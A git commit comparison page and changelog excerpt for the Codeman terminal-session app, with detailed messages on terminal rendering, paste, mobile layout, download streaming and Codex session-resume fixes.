Compare commits

...
Author SHA1 Message Date
Codeman maintainer 5b667264b4 chore: version packages 2026-09-10 03:20:58 +02:00
Ark0N e3d5fd90cd Merge pull request #392 from JDProfresh/fix/ios-safari-toolbar-gap
fix(mobile): lift the iOS Safari toolbar by the measured chrome overlap
2026-09-10 03:10:12 +02:00
Ark0N 713f632a64 Merge pull request #397 from irisitymichaelgrundberg/fix/detached-session-owns-its-pane-size
fix(terminal): let a detached session's own window own its pane size
2026-09-10 02:58:54 +02:00
Ark0N 92b5dfacb0 Merge pull request #396 from irisitymichaelgrundberg/fix/terminal-font-settle-before-fit
fix(terminal): fit the terminal only once the terminal font is measurable
2026-09-10 02:58:48 +02:00
Ark0N 890a1b0902 Merge pull request #395 from irisitymichaelgrundberg/fix/full-history-replay-row-alignment
fix(terminal): keep row alignment in the full-history pane replay
2026-09-10 02:58:42 +02:00
Ark0N a360763890 Merge pull request #394 from irisitymichaelgrundberg/fix/ctrl-v-pastes-twice
fix(paste): handle only the first paste event the Ctrl+V trap receives
2026-09-10 02:58:36 +02:00
Codeman maintainer 57899f879e feat(ui): add a Blur entrance animation on all four surfaces
An iOS-style focus pull: the thing arrives out of focus and the blur fades
off it as the opacity comes up. Opacity leads the blur (full opacity around
45%, blur still lifting), which is what separates it from a cross-fade.
Ships on tabs (440ms), agent windows (560ms), the terminal pane (520ms) and
connection lines (380ms), plus a `Soft focus` theme that sets all four.
Default stays `legacy`, so an untouched install is unchanged.

The terminal pane is the one surface that cannot blur itself the documented
way, and `blur` takes a deliberate exception to the "never a filter on
.terminal-container" rule. Every alternative was measured against a live
xterm and does not work: a backdrop-filter veil on ::before blurs perfectly
while STATIC, and Chrome silently drops the backdrop the moment ANY
animation runs on that pseudo-element (the veil computes blur(15.3px) while
the text behind it stays razor sharp); driving the radius from rAF buys the
same full-screen blur per frame plus main-thread work. The cost the rule
exists to avoid is inherent to blurring a terminal, so the style buys it
knowingly: opt-in, off by default, one ~520ms run per session open, class
straight back off, will-change still unset. Worst-case price, headless
SwiftShader with no GPU: frame deltas 16.7ms -> 33.3ms for the run, against
16.7ms flat for `fade`. cols x rows measured unchanged at 178x38 before,
during and after, so FitAddon never sees it.

The line entrance animates `filter` too, where each line already carried
its glow. Both kinds now hold it in --line-glow and both keyframes say
`blur(N) var(--line-glow)`, so the function lists match and interpolate
instead of the glow vanishing for the run and popping back (a lineage
line's glow is a different colour, set per element). Its 100% frame omits
`opacity` on purpose so the endpoint comes from the element's own resting
value: 0.9 subagent, 0.72 lineage, 0.95 working.

test/entrance-animations.test.ts is a new static guard over the whole
feature, not just this style: the rule -> keyframes -> theme-option chain a
style silently does nothing without, the terminal's paint-only property
allowlist (the FitAddon rule), the --line-glow contract, and reduced-motion
coverage. Mutation-checked both ways.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-10 02:57:40 +02:00
Codeman maintainer d4fe3afc9d feat(files): raise the download cap to 2GB and stream /api/download
The 50MB cap on file-raw, the attachment /raw route and /api/download was
memory protection for a `readFile()` that no longer exists: file-raw and
/raw were rewritten to stream through `sendFileBody()` and answer Range
requests, so size costs a read stream rather than RSS (measured: a 600MB
download moved peak RSS by ~37MB). All the cap still did was refuse
legitimate downloads of build artifacts, videos and archives.

It is now MAX_FILE_DOWNLOAD_BYTES in config/buffer-limits.ts, default 2GB,
env CODEMAN_MAX_DOWNLOAD_BYTES, 0 = unlimited. `parseByteLimitEnv()` is
separate from the `parseInt(...) || default` idiom used elsewhere in that
file precisely because that idiom reads 0 as falsy and would silently
restore the default for the one value that means "no limit".

/api/download was the last route that really did buffer the whole file. It
now shares sendFileBody() with the other two, so it streams, advertises
Accept-Ranges, and is resumable. Its Content-Disposition also goes through
buildContentDisposition() rather than raw interpolation.

Refusals move from 400 to 413 across all three, which is the correct status
for the case; with the cap at 2GB it is a path almost nothing reaches now.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-10 02:57:07 +02:00
Michael Grundberg 77fcd65b4a fix(terminal): force the re-measure, bound the wait, and test both
Review of the previous commit found that waiting for the font does not, on its
own, do anything.

`FitAddon.proposeDimensions()` measures nothing — it divides the container by a
CACHED cell size, and xterm refreshes that cache only from `open()`, from a
resize that actually changed the grid, and on a device-pixel-ratio change.
Nothing in it listens for font loading. So a fit that runs after the font
arrives can still divide by the fallback cell, propose the grid it already has,
and short-circuit before anything re-measures. The wait now ends by calling
`_charSizeService.measure()` itself, which is the step that makes the following
fit see the real font. Private API, as FitAddon's own dependency on `_core` is,
and guarded because a terminal can be disposed mid-wait.

The wait was also unbounded, and it sat behind the buffer-load gate. Neither
`FontFaceSet.load()` nor `FontFaceSet.ready` has a deadline, so a font request
that never settled left the tab spinning with live output queued behind it —
permanently, and on every session, since they share one promise. The comment
claimed the opposite ("a font that never loads must not block the terminal, so
this always resolves"), which was true of the per-face loads and false of
`ready`. It is now raced against TERMINAL_FONT_WAIT_MS, and the await moved
ahead of `_beginBufferLoad` so a slow font cannot hold output back at all —
which also removes the stale-select interaction with `_restoringFlushedState`,
since that flag is not yet set when the wait runs.

The awaited set no longer includes faces that cannot move the measured cell.
The bundled symbols font is ~1.2MB of private-use-area glyphs and xterm
measures `W`, so awaiting it put a megabyte in front of the first frame for
nothing; the generic families match no FontFace at all.

A runtime font change had the same race the boot-time one did:
applyTerminalFontFamily wrote the new family and fit on the next line, against
a family the browser might not have loaded. It now re-arms the wait and fits
again when it settles.

The claim that this could not be tested was wrong: the repo's vm harness
reaches both halves. The new suite pins the family filter, the forced
re-measure, the deadline, a rejecting load, a browser with no font API, and a
terminal disposed mid-wait — plus the four ordering properties in
selectSession, including that iOS Safari's synchronous focus still precedes the
first await. Each assertion was checked by reverting its fix.

Also corrects the docstring's reason for calling `document.fonts.load` (the
stylesheet is render-blocking and long parsed by then; the real reason is that
the WebGL renderer rasterises through a canvas atlas, and canvas text never
triggers a CSS font fetch), restores the JSDoc block the previous commit
displaced from getTerminalDimensions, and fixes a comment that described the
first fit as already having run when the mobile-Safari branch defers it.
2026-09-09 16:57:42 +02:00
Michael Grundberg 2b57c595df fix(terminal): gate the row-preserving skips on a capture, not the query flag
Review of the previous commit found the guard inverted: the three skips keyed
on `?full=1`, which is only what the client asked for. When the capture comes
back null — ENOBUFS, a timeout, a vanished pane, or a session with no mux at
all — the reply falls back to the byte history, which IS a stream of
successive frames and still needs stripping. Gating on the request returned it
whole: measured at 82KB against 4KB for the same buffer without `full=1`. A
direct-PTY session takes that path on every first selection, not only during
an outage. The skips now key on `isFullCapture`, meaning a capture arrived.

Three further defects the same review surfaced, all on this path:

Keeping the trailing rows is only sound when a cursor move follows to count
back up from them. On the two branches where the cursor query fails there is
no move, so the caret was left at the bottom of the pane — worse than before.
The cursor is now read first and settles both decisions together.

The move is relative rather than absolute. `CUP` numbers rows from the top of
the browser's screen, so it is only right while the browser's row count equals
the pane's, and `resizeWindow` does not wait for tmux, so a capture can be
taken before a requested resize applies. Measured against real tmux with a
browser four rows shorter than the pane: the absolute move lands on a blank
row, the relative one lands on the caret's row.

An all-blank pane no longer reads as content. Retaining trailing rows and
appending a move made it non-empty, and the caller treats non-empty as "replay
this", so a blank screen would have replaced real history — the downgrade
`_replayWouldShrinkBuffer` refuses, arriving from the server side where that
guard cannot see it.

The documentation claimed one line per screen row. `-J` joins a hard-wrapped
row into its logical line, so that is false whenever any row wrapped: measured
at 10 lines for a 12-row pane. Both entries now say what actually holds, and
the stale "NOT repositioned" contract in the mux interface is updated too.

Tests: the byte-history fallback is stripped, an empty capture leaves history
intact, and the extracted helpers are unit-tested directly rather than through
source-text matching. The slice window in the capture test is bounded at the
next method, having overrun into its neighbours.
2026-09-09 15:35:02 +02:00
Michael Grundberg 070e8da81b fix(terminal): yield only the resize send, and take sizing back on redock
Review of the previous commit found four defects in it.

The guard sat above the local fit, so it suppressed a reflow as well as the
server write. tab-rail-resize performs its single settle-time refit through
sendResize and has no fallback for a truthy activeSessionId, so dragging the
rail stopped reflowing a detached session's terminal in the dashboard. The
mobile-keyboard guard fourteen lines below already draws the line correctly —
withhold the send, never the reflow — and the guard now sits after the fit.

_lastResizeDims is one value for the whole window, and both guards skip
updating it, so while a popup owns a session that value no longer describes
the PTY. _redock repaired it only for the active session. Pop out A, switch to
B, close the popup: selecting A later found unchanged dimensions, returned
"unchanged", and selectSession skipped its 400ms redraw wait — while the
server, comparing against the real pane, did resize and did raise SIGWINCH, so
the fetch painted the pre-redraw frame. _redock now clears the record on every
path, active or not.

_redock could also fire a resize for a session already gone: _onSessionDeleted
redocks before cleanup, so the id can be dead and the request is a guaranteed
404. It now checks the session still exists.

restoreTerminalSize — the header's redraw button and Ctrl+Shift+R — silently
did nothing for a detached session while still reporting success with
dimensions nothing was set to. It now says the session is sized by its own
window, where the same button works.

The `force` comment claimed a client-side dedupe that does not exist; the
deduplication is server-side against the real pane. Corrected to say what the
flag actually buys. The _redock doc comment now records that the function
writes to the server and is not idempotent.

Tests: _redock was the untested half and is the half three of these defects
sit in. It now has coverage for clearing the stale record on both the active
and inactive paths, re-asserting only for the session being shown, and staying
silent for a deleted session. The existing sendResize test now asserts the
local fit still runs.
2026-09-09 15:24:55 +02:00
Michael Grundberg 0e82443222 fix(terminal): fit the terminal only once the terminal font is measurable
Opening a session could render its frame with characters spliced into each
other, as though two frames were overlaid — a status-line fragment landing
in the middle of a file path, for instance. Resizing the browser window
cleared it.

The first fit runs while the browser is still painting with a fallback font.
A cell measured against that font has a different width and height from one
measured against the terminal font, so the fit produces the wrong column and
row count. Codeman sizes the pane to it and replays the capture. When the
font finishes loading the measurement changes, the pane is resized a second
time, and the CLI repaints for a shape that does not match the frame already
on screen. Its later partial updates then land on the wrong rows.

selectSession now waits for the font before it measures, so the pane is
sized once, at the size that sticks, and the capture is taken at that size.
The wait always resolves, so a font that never loads cannot block a
terminal, and it resolves immediately once the font is in, so a tab switch
pays nothing after the first load.

document.fonts.ready alone is not enough: it can resolve before the
stylesheet declaring @font-face has been parsed. document.fonts.load for
each family in the stack is what actually requests the faces.

Measured on a session opening at 2328px wide: the cell went from 8.43x16.00
to 8.00x21.00 roughly 900ms in, moving the grid from 112x36 to 118x28 after
the replay had already been painted.
2026-09-09 14:20:34 +02:00
Michael Grundberg 323730a29d fix(terminal): keep row alignment in the full-history pane replay
Switching to a session left the caret one row below the composer's input
line, on the box border, and every cursor-relative update the CLI sent
afterwards was measured from the wrong row. Any fresh output repaired it,
because the CLI then repainted the whole frame.

Two things were wrong with the full-history replay, and they compound.

The capture never restored the cursor. The visible-frame path ends with an
absolute cursor move back to the pane's position; the linear path returned
its text and left the caret wherever the last character landed, which for an
agent CLI is the bottom-most row carrying text — the status line.

The rows it addressed did not line up with the pane's rows either. Four
transforms ran over the capture and each can delete a line: the trailing
blank rows were stripped, redraw-bloat stripping ran, the trim that cuts
everything above the Claude banner ran, and leading whitespace was removed.
All four are right for a byte stream of successive frames. A capture is the
rendered pane, one line per screen row, so each deletion shifted the frame
out from under the restored cursor.

The full-history path now appends the pane's own cursor position and keeps
every row, so row N of the reply is row N of the pane. The visible-frame and
tail paths are untouched.

Restoring the cursor is what makes row alignment load-bearing here, and
neither CLAUDE.md nor the architecture invariants said so — which is how
four line-deleting transforms accumulated on the path. Both now record it.

Verified against a live 315x59 pane: the reply carries 59 rows, its row 55
is the composer's input line matching tmux, and it ends with the cursor move
that lands there.
2026-09-09 14:20:34 +02:00
Michael Grundberg 5ac516dd3b fix(terminal): let a detached session's own window own its pane size
Popping a session out left both windows sizing the same pane. The dashboard
keeps the session active and keeps measuring it, and its terminal is
narrower than the popup because the session rail takes width the popup does
not have. One PTY cannot hold two sizes, so the CLI drew frames that fit
neither window and the popup showed a garbled frame.

sendResize and the debounced window-resize handler now stand aside for a
session this window has marked detached. A solo window is exempt, since it
is the owner. _maybeRefetchFullHistory already stood aside on exactly this
condition, so the rule is not a new one.

Sizing has to come back when the popup closes: while it owned the session
the dashboard sent no resizes, so the PTY still holds the popup's geometry.
_redock now re-asserts, with force, because the dimensions the dashboard
last sent are the ones it is about to send again.

Reproduced with a dashboard and a popup on one session: before, the pane
sat at 315 columns while the popup rendered 289. After, both report the
same size and the popup's frame matches the pane exactly.
2026-09-09 14:20:34 +02:00
Codeman maintainer 5130ca6633 fix(pr-bot): fail fast when the review model's budget is spent
Claude Code answers an exhausted model budget INSIDE the turn ("You've
reached your Fable limit. Run /usage-credits to continue or switch models
with /model.") and then sits there with nothing to write. The reviewer never
produces a report, so `runTurn` waited out its full 40-minute deadline and
reported a bare "timed out after 40 min without a report", which reads as a
hung reviewer rather than an account that needs attention.

Measured on 2026-09-08: #388, #393, #394 and #377 each lost 40 minutes this
way, and because every attempt counted, all four reached MAX_AUTO_RETRIES and
would NOT have been picked up again once the budget returned. One spent
afternoon quietly took the whole queue out of service.

`findModelLimitNotice()` reads the notice off the pane and `runTurn` returns
a new `limit` outcome instead of waiting. It is consulted in exactly two
places, both of which mean "the turn produced nothing": on a stop where
`isDone()` is still false, and on each timed-out wait slice. A review that
merely discusses usage limits in its own findings therefore cannot be
mistaken for one that hit the wall, and the pattern matches neither the model
name nor a straight apostrophe, since the pane renders a typographic one and
every model prints the same sentence.

A spent budget is an account condition, not a bad PR, so it no longer spends
the per-head retry budget: the queue resumes by itself when the budget does.
Telegram now names the cause and the file to change.

Tests use the pane captured verbatim off the run that lost the 40 minutes.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-08 19:27:43 +02:00
Michael GrundbergandClaude Opus 5 b87bc6871b fix(paste): handle only the first paste event the Ctrl+V trap receives
Ctrl+V in the terminal inserted the clipboard text twice. Right-click →
Paste inserted it once.

`_handleImagePaste()` appends a hidden contenteditable div, focuses it, and
reads the clipboard out of the paste event that lands there. Two separate
routes deliver that event for a single keypress. The function issues
`document.execCommand('paste')` itself, which in Firefox dispatches a
trusted paste event and then returns false, because the trap cancels the
event and the command never completes; Chromium and WebKit refuse that
command and dispatch nothing. The keydown's own default action delivers the
other, because xterm calls the custom key handler before its own `cancel()`,
so returning false never calls preventDefault. Firefox therefore ran the
trap's listener twice and both runs reached `terminal.paste()`. The
context-menu paste involves no keydown at all, which is why that path stayed
correct.

The trap now accepts the first paste event and cancels every later one, so
how many paste events a browser delivers no longer changes what the PTY
sees. Measured on a live install, one Ctrl+V each: Firefox two events and
two writes before this change, Chromium and WebKit one and one, and every
engine one write after it.

The `execCommand('paste')` call stays. Stripping it out also ends the
doubling, and all three engines still deliver one event without it, since
`trap.focus()` has already run when the key's default action resolves. It is
kept because the trap technique arrived in #84 for plain HTTP and for
mobile, and a desktop measurement says nothing about real iOS Safari or
Android Chrome: where a browser aims the default action at the element
focused when the keydown began, the command is the only route into the trap,
and the trap is the only place clipboard image blobs are read.

test/image-paste-trap.test.ts loads image-input.js into a `node:vm` context
with a fake document and fires two paste events at the trap. It covers text
and images, and fails on the old code with the text pasted twice and the
image uploaded twice.

Docs: the invariant goes into docs/architecture-invariants.md as a Terminal
paste section and into CLAUDE.md as a Frontend entry, both recording the
measured event counts and why the redundant call is still there. README.md
and the Keyboard Shortcuts and Input and Voice wiki pages gain a Ctrl+V row,
which all three tables were missing while listing every other clipboard
binding.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-08 16:49:50 +02:00
JD c367b12f77 fix(mobile): lift the iOS Safari toolbar by the measured chrome overlap, not 100vh minus the visual height
The phone block lifted the toolbar (and padded .main) by (100vh - --app-height) on iOS Safari to clear a bottom bar that position: fixed elements were assumed to sit behind. On iPhone Safari fixed elements already stop above the bar, and 100vh is the large viewport with the bar collapsed while --app-height is the visual viewport with it expanded, so the expression measures the bar's collapsible height and shows up as an empty band between the toolbar and the bar whenever the bar is expanded. The terminal was padded by the same amount.

The lift is now --chrome-overlap, set in updateAppHeight() as innerHeight minus the visual viewport height: the distance the layout viewport that anchors fixed elements extends past the visible area. That is 0 on iPhone Safari, so the toolbar meets the bar, and it is the overlap itself on any browser where fixed elements really do land behind the chrome, so those keep the lift. The keyboard-visible rules, which already override the toolbar offset, are unchanged.
2026-09-08 01:39:07 -04:00
Codeman maintainer a164c07f92 chore: version packages 2026-09-07 22:54:36 +02:00
Codeman maintainer 4f2dfb4e6d fix(mobile): carry resumeId through the phone overview's past rows
#386 made Codex conversations resumable from Past Sessions, and
resumeMobileOverviewSession() correctly passes row.resumeId on to
resumeHistorySession(). The phone's own row projection never copied the
field off the unified-list item though, so row.resumeId was always
undefined there and a tapped Codex row started a FRESH session on a thread
that was already on disk. The desktop path worked; only the phone was blind.

The test fails without the projection line, and pins the other half too: a
claude row must not grow a resumeId, since the field is what distinguishes
"resume this conversation" from "start a new one".

Docs: CLAUDE.md and architecture-invariants both still described the unified
list as merging Claude transcript files. It has been three stores since this
PR (Claude's ~/.claude/projects, omp's ~/.omp/agent/sessions, codex's
~/.codex/sessions), the alias field keeps its Claude-era name without being
Claude-only, and the scanner-only rule behind resumeId was written down
nowhere.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-07 22:44:25 +02:00
Ark0N 344e93c824 Merge pull request #386 from irisitymichaelgrundberg/feat/codex-resume
Merging with the phone-overview resumeId fix and the two unified-list doc passages applied on master.
2026-09-07 22:43:46 +02:00
Codeman maintainer f1b7283393 fix(cli-registry): guard workDetect.workingLine like every other config regex
#385 made the composer glyph and the working status line per-CLI registry
data, which is right, but `workingLine` arrived as a config-supplied regex
validated with a bare `new RegExp()`. That skips `compileVersionRegex()`,
the helper the registry uses for exactly this: a `~/.codeman/clis.json`
override can set the field, the compiled pattern is run against every
accumulated PTY chunk and every pane capture, and a nested quantifier there
backtracks on the event loop for the whole server rather than one session.

Route it through the helper in both places, which are not redundant: the
schema refine rejects the entry at LOAD time so a bad pattern never reaches
a session, and `_workingLinePattern()` compiles through the same helper so
the runtime cannot hold a pattern the schema would have refused. The helper
returns null instead of throwing, so the Claude-pattern fallback stops being
a try/catch and becomes structural. Both shipped patterns compile unchanged,
and Claude's is behaviourally identical to CLAUDE_WORKING_LINE_PATTERN.

Also match the Codex footer case-insensitively on the E. It was
characterised against codex-cli 0.152.1, which prints a lowercase `esc`;
a version capitalising it would make the whole fix silently inert, since
the pane would simply never look like it was working.

Docs: CLAUDE.md, architecture-invariants and cli-registry.md all still
stated the Claude-mode-only rule this PR retires, and none of them named
the new capability or the regex guard.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-07 22:42:20 +02:00
Ark0N a49be03f96 Merge pull request #385 from irisitymichaelgrundberg/fix/work-detection-external-clis
Merging with follow-up fixes applied on master: workingLine routed through compileVersionRegex() in both the schema refine and _workingLinePattern(), the Codex footer matched case-insensitively on the E, plus the doc passages that stated the retired Claude-mode-only rule.
2026-09-07 22:41:25 +02:00
Codeman maintainer 7fde978ce8 chore: version packages 2026-09-07 19:11:56 +02:00
Codeman maintainer 8ee7926e27 feat(agent-cases): tag agent-spawned case dirs and sweep their leftovers
A long orchestration creates one case directory per worker and deleting the
sessions never removed them, so ~/codeman-cases accumulated scratch folders
that were indistinguishable from real projects. They are now labelled and
have a cleanup path.

- src/agent-case-marker.ts: a case dir quick-start CREATES for an agent-driven
  spawn gets a .codeman-agent-case.json marker (when, by whom, parent session,
  mode). Only the create branch writes it, so a linked case, a cloned repo or
  any pre-existing path is never labelled; reading is total, so a malformed
  marker means "not agent-created" rather than a half-trusted entry.
- The signal is the new X-Codeman-Agent-Origin header the skill preamble sets
  on its shared curl (preamble bumped to 1.22.0), or an agentOrigin body
  field, falling back to a resolved parentSessionId so a worker spawned by a
  stale skill copy is still labelled.
- GET /api/cases publishes it as agentCreated; GET /api/cases/agent-created is
  a read-only cleanup listing adding inUse and modifiedAt; Add Case -> Manage
  badges each case and offers a review-then-delete sweep that names every
  directory in its confirm and skips any case a live session is working in.
  Removal stays on the existing DELETE /api/cases/:name.
- Agent preamble caches are collected too: ~/.cache/codeman-agent-<id>.sh was
  written per claude session and never removed (236 leftovers measured on a
  working machine). Now deleted with the session and swept at boot, guarded by
  a live-session keep set plus a 7-day age floor.

Verified end to end on an isolated instance: marker written for header, body
and lineage-only spawns, absent with no agent signal and for a pre-existing
directory; inUse flipping on session end; badge, sticky bar, confirm and sweep
driven in a browser; preamble seeded on create, removed on delete, boot sweep
taking only the aged orphans.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-07 19:09:24 +02:00
Michael GrundbergandClaude Opus 5 2f9663e389 Merge branch 'master' into feat/codex-resume
master and this branch both rewrote the two `_claudeSessionId` resets inside
`start()`, so `src/session.ts` conflicted at both of them.

master's commit ccfda623 puts `restoredConversation` at the head of each
fallback chain. A restored mux attach means the CLI never stopped, so a
`/clear` before the Codeman restart may already have moved it to a
conversation the launch id knows nothing about. The persisted chain's tail is
that conversation, and the CLI's own hook reported it first-hand.

This branch adds `this._codexConfig?.resumeSessionId` to the same two chains,
so a resumed codex session keeps its thread-id alias across every mux reattach
and boot recovery.

Both fixes belong. Each chain now reads restoredConversation, then
_resumeSessionId, then omp's alias, then codex's alias, then the launch id.
The comments from both sides are kept.

test/session-claude-conversation-chain.test.ts pins the shape of those two
assignments by matching the source text, and its pattern named omp's alias as
the last term before `this.id`. Codex's alias now sits between the two, so the
pattern widens to pin the ends of the chain and let the middle grow. A `[^;]`
run cannot cross a statement boundary, so each match is still one assignment.

Checked on the merged tree: typecheck, lint, prettier and the frontend syntax
check all pass, and the CI suite runs 6721 tests green across 349 files.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-09-07 08:48:31 +02:00
Michael Grundberg 327e440607 fix(codex): fold a codex session into its own rollout row
Review fixes for #386.

Duplicate rows. A codex conversation showed twice, once live and once as a
past rollout row, because nothing aliased a codex session to its thread id.
That is worse than cosmetic: the stale row still resumes, so clicking it
starts a second `codex resume` on a thread already open in another pane.

  - A RESUMED session knows its thread id up front, so it folds from its own
    side: add `codexConfig.resumeSessionId` to the `claudeSessionId` chain.
    Not only in the constructor — `start()` recomputes that id at two further
    points (the mux branch, and the unconditional "third reset point" whose
    own comment already warned that omitting omp's fallback there stomps the
    mux branch's resolved alias). Both listed Claude's and omp's ids only, so
    for codex every mux reattach and boot recovery reset the alias back to
    the Codeman id and the duplicate returned.
  - A FRESH session has no thread id until codex writes the rollout, so it is
    folded from the other side. The scanner now reports
    `session_meta.originator`, which is `codeman_<sessionId>` for every pane
    Codeman spawns, and `gatherUnifiedInputs()` stamps the matching live and
    persisted rows, newest rollout winning (`/new` inside the TUI leaves
    several rollouts sharing one originator).
  - Persisted rows read `codexConfig.resumeSessionId` too. A resumed session
    demoted to a persisted-only record would otherwise lose its alias, and
    the originator fallback cannot rescue that one: a resumed rollout keeps
    its ORIGINAL session_meta, so it still names the pane that created the
    thread rather than the pane that resumed it.

Identity cache. It was written as soon as the thread id was known, but codex
writes the first user message only when the user submits, so any scan in that
window pinned `firstPrompt: undefined` for the life of the process — and the
home screen, the command palette and the search-index refresh all scan.
`shouldCacheIdentity()` now keeps an identity only once the prompt is known or
the head read filled its whole window.

Also from review: both caps count emitted rows rather than file index, so a
store of sub-agent threads no longer spends the `lastPrompt` budget before the
first row that needed it; the cache is an `LRUMap` sized like the one beside
it; the unreachable filename fallback is gone; a rollout recording no cwd is
dropped rather than emitted with `workingDir: ''`; and the unified-session
module header names all three transcript stores.

Tests. The resume wiring now has cases for a row with a thread id, a row
without one, and a `resumeId` on a non-codex row; the "no continuation is
wired" case narrows to gemini/antigravity, which is no longer true of codex.
`codex-resume-alias-survives-start.test.ts` drives a real Session through
`start()` rather than asserting on pre-stamped inputs — that gap is why the
reset points went unnoticed. Plus the maintainer's own cache repro, the
tail-budget case, a no-cwd case, and merge cases for both folds.
2026-09-06 21:53:38 +02:00
Michael Grundberg 8285fff91c feat(codex): list codex conversations and resume them
Codex conversations never appeared in the session list, and the resume path
skipped codex, so picking one back up meant finding its thread id by hand and
POSTing codexConfig.resumeSessionId to /api/sessions.

Two gaps caused it:

- The unified list is built from ~/.claude/projects plus omp's own store.
  Codex writes to neither: its rollouts live in ~/.codex/sessions/<y>/<m>/<d>.
- terminal-ui.js sends a continuation only for the CLIs with a
  "continue most recent" flag. Codex has no such flag — it names a thread by an
  exact id — and nothing supplied one.

Add codex-transcript.ts, the codex analog of omp-transcript.ts, and wire it into
gatherUnifiedInputs() beside the omp scan. A rollout row carries `resumeId`, the
thread id `codex resume` takes, and the resume path sends it as
codexConfig.resumeSessionId.

`resumeId` is what keeps the two kinds of row apart: only a transcript scanner
sets it, so a LIVE codex row — whose sessionId is Codeman's own uuid — can never
ask codex for a thread that does not exist.

Three things measured against a real store of 519 rollouts rather than assumed:

- Rollouts are far too large to read whole (median 407 KiB, p90 1.3 MiB, max
  25 MiB, 381 MiB total), so this reads a 128 KiB head for the identity and the
  opening prompt and a bounded tail for the most recent one. session_meta is
  written once and never rewritten, so per-path identity is cached; a warm
  rescan of that store costs ~75ms against ~470ms cold.
- codex 0.152.1 emits no event_msg/user_message rows at all. It writes
  event_msg/item_completed carrying an item.type of UserMessage. Both shapes are
  read, plus response_item as a last resort.
- That last resort sees injected context, and the first such row is the repo's
  AGENTS.md every time, so injections are dropped rather than used as titles.

Sub-agent threads (thread_source: 'subagent') are left out; codex spawns them
for itself and on a real store they outnumber the resumable threads.
2026-09-06 19:45:36 +02:00
Michael Grundberg 51957e2ed4 fix(session): let each CLI declare how its own pane shows work
A Codex session reported `isWorking: false` for its entire life, including
mid-turn. Codeman has four paths that mark a session working, and all four were
inert for Codex:

- The spinner fast path tests eight braille frames, and Codex animates none.
- The activity-streak fallback was wrapped in `!isExternalCliMode(mode)`.
- The pane probe inside `_confirmIdle` would have matched, since Codex prints
  `esc to interrupt`, but arming it required the literal glyph `❯` and Codex
  draws `›` on its composer row.
- The text detector sat inside `_processExpensiveParsers`, whose first statement
  returns early for an external CLI.

Add an optional `workDetect: { promptGlyph, workingLine }` to CliCapabilities,
so the two strings that differ per CLI are registry data rather than constants
in the detector. Claude declares its existing pair and behaves as before. Codex
declares `›` and `esc to interrupt`. The text detector moves above the
external-CLI early return, guarded on the descriptor so a CLI without one still
skips the ANSI strip that the early return used to save it.

A CLI that declares no descriptor falls back to Claude's pair, and the
activity-streak gate now reads "has a descriptor, or is not external", so the
plain shell mode keeps the behaviour it had.

Rewrite the test that asserted the old premise in its own comment, so it makes
the same guarantee for a genuinely uncharacterised CLI, and add Codex coverage
built from verbatim pane captures on Codex CLI 0.152.1.
2026-09-06 17:41:01 +02:00
71 changed files with 4070 additions and 252 deletions
+75
View File
@@ -1,5 +1,80 @@
# aicodeman
## 1.26.2
### Patch Changes
- Terminal rendering fixes, a Ctrl+V paste fix, an iOS Safari toolbar fix, a 2GB download cap, and a Blur entrance animation.
### Terminal rendering
Three independent causes behind #398, where opening a session rendered a frame with characters spliced into each other and left the caret on the composer's border instead of its input line, until the CLI next wrote anything:
- **The full-history replay now keeps row alignment** (#395). The linear capture path never restored the cursor, so every cursor-relative update the CLI sent afterwards was measured from the status line instead of the pane's real position, and four transforms that each can delete a line (trailing-blank stripping, redraw-bloat stripping, the pre-banner trim, leading-whitespace removal) shifted the frame out from under it. The full-history path now appends the pane's own cursor position and keeps every row, so row N of the reply is row N of the pane. The visible-frame and tail paths are untouched.
- **The first fit waits for the terminal font** (#396). A cell measured against a fallback font gives the wrong column and row count, so the pane was sized twice and the CLI repainted for a shape that no longer matched the frame on screen. `selectSession` now holds for the font before measuring, bounded at 2s so a font that never arrives cannot strand a session, and it ends by re-measuring explicitly — `FitAddon.proposeDimensions()` divides by a cached cell size and nothing in it listens for font loading, so waiting alone would still divide by the fallback cell.
- **A detached session's own window owns its pane size** (#397). Popping a session out left both windows sizing one PTY, and the dashboard's terminal is narrower than the popup because the session rail takes width the popup does not have, so the CLI drew frames that fit neither. The dashboard now withholds the resize send (never the local reflow) for a session showing in its own window, and takes sizing back on redock.
### Other fixes
- **Ctrl+V no longer pastes twice** (#394). One keypress delivered two paste events to the clipboard trap: Firefox dispatches a trusted event for `document.execCommand('paste')` and then returns `false`, and the key's own default action fires another, because xterm's custom key handler returns false without cancelling the keydown. Right-click → Paste has no keydown, which is why only the keyboard duplicated. The trap now consumes exactly one event per keypress.
- **iOS Safari: the phone toolbar sits on Safari's bottom bar** (#391, #392). The toolbar was lifted by `100vh - --app-height`, which on iPhone Safari measures the bar's collapsible height rather than an overlap — fixed elements there already stop above the bar — leaving an empty ~40px band and padding the terminal by the same amount. The lift is now `--chrome-overlap` (`innerHeight` minus the visual viewport height), which is 0 on iPhone Safari and equals the real overlap anywhere fixed elements do land behind the chrome.
### Downloads
`file-raw`, the attachment `/raw` route and `GET /api/download` now cap at **2GB** instead of 50MB, configurable via `CODEMAN_MAX_DOWNLOAD_BYTES` (`0` = unlimited). The old cap was memory protection for a `readFile()` that no longer exists: those bodies stream and answer `Range` requests, so size costs a read stream rather than RSS (measured: a 600MB download moved peak RSS by ~37MB), and all the cap still did was refuse legitimate downloads of build artifacts, videos and archives. `/api/download` was the last route that really did buffer the whole file; it now streams, advertises `Accept-Ranges` and is resumable. Refusals move from `400` to `413`, the correct status for the case.
### Blur entrance animation
A new opt-in `Blur` style on all four entrance surfaces (tabs, agent windows, the terminal pane, connection lines), plus a `Soft focus` theme that sets all four: an iOS-style focus pull where the thing arrives out of focus and the blur fades off it as the opacity comes up. App Settings → Appearance → Entrance Animations, or mix per surface at `?animlab=1`. Entrance animations stay off by default, so an untouched install is unchanged.
### Maintainer tooling
The PR bot now fails fast when the review model's budget is spent, instead of hanging a review for the full 40-minute timeout and burning its retry cap.
### Thanks
